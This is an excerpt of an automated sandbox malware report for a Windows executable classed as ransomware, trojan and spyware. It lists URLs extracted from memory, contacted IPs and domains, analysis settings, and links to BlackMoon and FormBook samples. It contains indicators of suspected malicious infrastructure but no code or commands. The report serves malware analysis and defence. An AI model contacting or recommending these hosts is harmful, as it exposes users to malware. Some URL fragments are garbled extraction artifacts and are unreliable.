                                                      http://www.ksfm2.comD74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://182.254.116.116/d?dn=sinacloud.net?dn=sinastorage.cnD74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://waigua.lanzn.com/b015nykdcssD74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&1D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C492000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://119.29.29.29/d?dn=BUSD74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219757684.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://182.254.116.116/d?dn=cdD74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://shoufeifz.qijianfz.com/d497eaD74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://182.254.116.116/d?dn=sinastorage.comC:D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://182.254.116.116/d?dn=sinastorage.cnMwmD74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://119.29.29.29/d?dn=sinastorage.com183.60.95.221D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://ip.qq.com/v1-dll-api.jsdama.comD74384FB8D2C9.exe, 00000002.00000003.2095066577.0000000005635000.00000004.00000020.00020000.00000000.sdmp, 9683JE76z.dll.2.drfalse
                                                        high
                                                        http://shoufeifz.qijianfz.com/fD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CC2000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CC2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://182.254.116.116/d?dn=sinastorage.cn-wD74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://crl.ver)svchost.exe, 00000003.00000002.3741348324.000001E17F8CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.90yundian.com/liebiao/8115018243F766D7D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000006058000.00000004.00000800.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.00000000030CB000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007D4D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, DV95YAA3.htm.2.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://119.29.29.29/d?dn=sinacloud.net.de5D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://182.254.116.116/d?dn=sinacloud.net5w%D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://shoufeifz.qijianfz.com/style.css)D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.GeeM2.comD74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://shoufeifz.qijianfz.com/ZD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://114.114.114.114/d?dn=sinacloud.net~pD74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://shoufeifz.qijianfz.com/tyle.css1YdD74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://shoufeifz.qijianfz.com/rD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.Haom6.comhttp://www.GeeM2.comWemadeD74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://shoufeifz.qijianfz.com/qD74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4568816305.0000000005FFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.sohu.com/VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                          high
                                                          http://182.254.116.116/d?dn=ddD74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://sinastorage.com/question/VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                            high
                                                            http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C450000.00000004.00001000.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C457000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.m6dlq.com/D74384FB8D2C9.exe, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97- | D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d | D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4567640195.0000000005637000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://shoufeifz.qijianfz.com/style.cssR | D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29.29/d?dn=sinastorage.cn49.7.37.97 | D74384FB8D2C9.exe, 00000002.00000002.4567640195.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://114.114.114.114/d?dn=sinastorage.com& | D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://114.114.114.114/d?dn=sinastorage.cnyp | D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinacloud.net | D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EBC4000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://114.114.114.114/c | D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinastorage.comwuj | D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.iqiyi.com/ | D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://114.114.114.114/d?dn=sinastorage.comstio | D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinacloud.net-w | D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://shoufeifz.qijianfz.com/y | D74384FB8D2C9.exe, 00000002.00000003.2591950560.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinastorage.cn49.7.37.97? | D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29.29/d?dn= | VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2213442539.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219757684.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2219458854.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.GameM2.com | D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29.29/d?dn=sinastorage.cn | D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29.29/d?dn=sinacloud.net.net | D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinastorage.com | D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eyuyan.com | D5AESTNHE.dll.2.dr | false | | high
https://waigua.lanzn.com/b015nykd | D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, DV95YAA3.htm.2.dr | false | Avira URL Cloud: safe | unknown
http://plugin1.config.hyocr.com:8080/apisvrs.php;http://plugin2.config.hyocr.com:8080/apisvrs.php | B81BTTTQM.dll.2.dr | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinastorage.cniw | D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinacloud.netm | D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB8B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29.29/d?dn | D74384FB8D2C9.exe, 00000002.00000003.2842042739.0000000005634000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB6C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinastorage.cnLMEMXH; | D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5E000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2593025818.000000000EB59000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinastorage.com& | D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://114.114.114.114/d?dn=cd | D74384FB8D2C9.exe, 00000002.00000003.2841831298.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.0000000005645000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.8pkw.com:5566/kss_api/io.php?a=uplog&apiver=905&c=0&gdata=1&softcode=1000011&&lgid=0&f=&x | D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CCD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://114.114.114.114/d?dn=sinacloud.net88701 | D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinastorage.cn | D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D086000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.8pkw.com:5566/kss_api/io.php | D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C4D3000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://114.114.114.114/d?dn=sinastorage.cn&BZ? | D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB90000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4588166546.000000000EB9D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.m6dlq.com/PEC2 | D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29.29/d?dn=sinastorage.com14$ | D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29.29/d?dn=sinacloud.net | D74384FB8D2C9.exe, 00000002.00000002.4584493943.000000000D080000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4563512115.0000000003072000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007CE0000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4574534681.0000000007D5A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2841831298.000000000564D000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EBC4000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.2336822343.0000000005645000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3800701119.000000000564D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29) | D74384FB8D2C9.exe, 00000002.00000003.3852734717.000000000EB6C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.8pkw.com:5566/kss_api/api.php_ksreg_http://www2.8pkw.com/kss_api/api.php_ksreg_13_ksreg_1 | D74384FB8D2C9.exe, 00000002.00000002.4582376615.000000000C43A000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://waigua.lanzn.com/b015nykdK | D74384FB8D2C9.exe, 00000002.00000002.4587864880.000000000EB5A000.00000004.00000020.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000003.3854584841.000000000EB59000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://114.114.114.114/d?dn=sinastorage.comfZ | D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB9B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://119.29.29.29/d?dn=sinastorage.comn | D74384FB8D2C9.exe, 00000002.00000003.2592634274.000000000EB87000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://plugin.config.hyocr.com:8080/hyver.php?ver=%d&user=%s | B81BTTTQM.dll.2.dr | false | Avira URL Cloud: safe | unknown
http://182.254.116.116/d?dn=sinacloud.netmAE3 | D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://sinastorage.cn/question/ | VIP-#U4f1a#U5458#U7248.exe, 00000000.00000002.2067835798.0000000000F56000.00000002.00000001.01000000.00000003.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4511283119.0000000000486000.00000002.00000400.00020000.00000000.sdmp, D74384FB8D2C9.exe, 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp | false | | high
http://182.254.116.116/d?dn=sinacloud.netn4 | D74384FB8D2C9.exe, 00000002.00000002.4563191406.0000000002E29000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.192.110.226 | so.seos-lb.com | United States | 55992 | QIHOOBeijingQihuTechnologyCompanyLimitedCN | false
182.254.116.116 | unknown | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | false
27.221.16.179 | unknown | China | 4837 | CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | false
43.154.56.182 | www.8pkw.com | Japan | 4249 | LILLY-ASUS | false
27.221.16.149 | sinacloud.net | China | 4837 | CHINA169-BACKBONECHINAUNICOMChina169BackboneCN | false
114.114.114.114 | unknown | China | 174 | COGENT-174US | true
103.235.47.188 | unknown | Hong Kong | 55967 | BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd | false
119.28.131.242 | shoufeifz.qijianfz.com | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | false
103.235.46.96 | www.wshifen.com | Hong Kong | 55967 | BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd | false
183.60.95.221 | sinastorage.cn | China | 58466 | CT-GUANGZHOU-IDCCHINANETGuangdongprovincenetworkCN | false
163.181.92.233 | ww1.sinaimg.cn.w.alikunlun.com | United States | 24429 | TAOBAOZhejiangTaobaoNetworkCoLtdCN | false
123.126.45.208 | sinastorage.com | China | 4808 | CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | false
49.7.37.97 | unknown | China | 23724 | CHINANET-IDC-BJ-APIDCChinaTelecommunicationsCorporation | false
119.29.29.29 | unknown | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | false
43.153.236.147 | www.sogou.com | Japan | 4249 | LILLY-ASUS | false
                                                                  IP
                                                                  127.0.0.1
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1569132
                                                                  Start date and time:2024-12-05 14:24:11 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 9m 50s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:7
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:VIP-#U4f1a#U5458#U7248.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:VIP-.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.rans.troj.spyw.evad.winEXE@4/42@20/16
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 84%
                                                                  • Number of executed functions: 180
                                                                  • Number of non-executed functions: 246
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                  • Excluded IPs from analysis (whitelisted): 2.20.68.80, 2.20.68.83, 184.30.24.109
                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, www.iqiyiweb.akadns.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, iqiyi.com.edgekey.net, prod.fs.microsoft.com.akadns.net, e99042.a.akamaiedge.net
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: VIP-#U4f1a#U5458#U7248.exe
Time | Type | Description
08:25:07 | API Interceptor | 3x Sleep call for process: svchost.exe modified
08:25:45 | API Interceptor | 9972445x Sleep call for process: D74384FB8D2C9.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.192.110.226 | 4.exe | malicious | BlackMoon | www.so.com/
 | 2.exe | malicious | BlackMoon | www.so.com/
 | 1.exe | malicious | BlackMoon | www.so.com/
 | 3.exe | malicious | BlackMoon, XRed | www.so.com/
 | 1.exe | malicious | BlackMoon | www.so.com/
 | f2.exe | malicious | BlackMoon | www.so.com/
 | f1.exe | malicious | Unknown | www.so.com/
 | chAJcIK6ZO.exe | malicious | Unknown | www.so.com/
 | chAJcIK6ZO.exe | malicious | Unknown | www.so.com/
 | d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe | malicious | Bdaejec | www.so.com/
182.254.116.116 | 3.exe | malicious | Unknown | 182.254.116.116/d?dn=sinacloud.net
 | 3.exe | malicious | Unknown | 182.254.116.116/d?dn=sinastorage.com
 | Dlabel_PC.exe | malicious | Unknown | 182.254.116.116/d?dn=login.tim.qq.com
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)

Match: so.seos-lb.com
4.exe | malicious | BlackMoon | 104.192.110.226
2.exe | malicious | BlackMoon | 104.192.110.226
1.exe | malicious | BlackMoon | 104.192.110.226
3.exe | malicious | BlackMoon, XRed | 104.192.110.226
1.exe | malicious | BlackMoon | 104.192.110.226
f2.exe | malicious | BlackMoon | 104.192.110.226
f1.exe | malicious | Unknown | 104.192.110.226
chAJcIK6ZO.exe | malicious | Unknown | 104.192.110.226
chAJcIK6ZO.exe | malicious | Unknown | 104.192.110.226
d48c236503a4d2e54e23d9ebc9aa48e86300fd24955c871a7b8792656c47fb6a.exe | malicious | Bdaejec | 104.192.110.226

Match: www.wshifen.com
360safe.exe | malicious | Unknown | 103.235.47.188
XiaobingOnekey.exe | malicious | Unknown | 103.235.46.96
DNF#U604b#U62180224a.exe | malicious | Unknown | 103.235.46.96
http://profdentalcare.com | malicious | Unknown | 103.235.46.96
Iifpj4i2kC.exe | malicious | FormBook | 103.235.47.188
https://www.baidu.com/link?url=7AgUGxkCgEsQdPm9T1PXcA0XghaPOWMLvdhGyyVngg844uS4x-KZy4IMqs1ov0OgdFqhAB-_X2oOV9exK4hWC_&wd=ZWxraW58WTI5eVpUUmpaUzVqYjIwPXxNYkdVSlpkdVROdWNyeW1UWU1laElVVW1QbGRGb0F5RmNLcWJadW1CT01YYw== | malicious | HTMLPhisher | 103.235.46.96
kHslwiV2w6.exe | malicious | FormBook | 103.235.47.188
http://wap.smarthomehungary.com/ | malicious | Unknown | 103.235.46.96
http://www.allencai.net/ | malicious | Unknown | 103.235.46.96
LuJJk0US5g.msi | malicious | Unknown | 103.235.46.96

Match: sinacloud.net
4.exe | malicious | BlackMoon | 27.221.16.149
3.exe | malicious | Unknown | 27.221.16.179
2.exe | malicious | BlackMoon | 27.221.16.179
